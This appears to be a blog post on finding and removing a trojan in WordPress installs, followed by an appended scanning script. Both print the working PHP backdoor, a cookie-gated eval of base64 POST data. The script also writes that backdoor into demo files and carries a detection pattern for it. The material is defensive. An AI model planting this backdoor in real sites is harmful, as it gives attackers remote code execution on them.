Goodbye Horses
So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed. When visiting an infected site, most folks are being prompted to download:
Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.
So how do you find out if your install has been hit? Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php:
<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>
If you see that floating around, get rid of it! Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.
Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:
grep -R 0bdcf3981272c15a /home/user/example.com/*
Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed. Give that command a few minutes to run and you should get a path of where that code snippet can be found. All you have to do at that point is purge it and clear any cache you might have on your WP install.
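The same sweep as a small script, as an added example that is not part of the original post: it goes a bit further than the single grep by also descending into dotfiles and by flagging the same eval(base64_decode(...)) construct under a different cookie name. The function names `scan_tree` and `make_demo_tree`, the `GENERIC` pattern and the demo files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not the post author's code. MARKER is the cookie name from the
# snippet above; GENERIC is an assumption that variants keep the
# eval(base64_decode($_POST[..])) shape under a different cookie name.
MARKER='0bdcf3981272c15a'
GENERIC='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(POST|GET|COOKIE|REQUEST)'

# scan_tree DIR: print "reason<TAB>path" for each suspicious file. find walks
# hidden files and directories too, which a trailing /* glob would skip.
scan_tree() {
    root=$1
    # Exact marker from the post, in any file type.
    find "$root" -type f -exec grep -lF -e "$MARKER" {} + 2>/dev/null |
        while IFS= read -r f; do printf 'marker\t%s\n' "$f"; done
    # Same construct without the known marker, PHP files only.
    find "$root" -type f -name '*.php' -exec grep -lE -e "$GENERIC" {} + 2>/dev/null |
        while IFS= read -r f; do
            grep -qF -e "$MARKER" "$f" || printf 'generic\t%s\n' "$f"
        done
}

# make_demo_tree DIR: constructed sample files so the scan can be tried offline.
make_demo_tree() {
    mkdir -p "$1/wp-content/.cache"
    # Infected: the snippet from this post sitting at the top of index.php.
    cat > "$1/index.php" <<'EOF'
<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>
<?php require('./wp-blog-header.php');
EOF
    # Constructed variant: different cookie name, tucked into a hidden directory.
    cat > "$1/wp-content/.cache/x.php" <<'EOF'
<?php if(isset($_COOKIE['constructed'])){ eval( base64_decode( $_REQUEST['f'] ) ); } ?>
EOF
    # Clean file: ordinary base64_decode use must not be flagged.
    printf '%s\n' '<?php $img = base64_decode($stored); ?>' > "$1/wp-content/clean.php"
}

# Usage: sh scan.sh /home/user/example.com
if [ $# -gt 0 ]; then scan_tree "$1"; fi
```

Keep the script outside the tree you scan, since it contains the marker string itself and would otherwise show up in its own results.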
Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.
All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.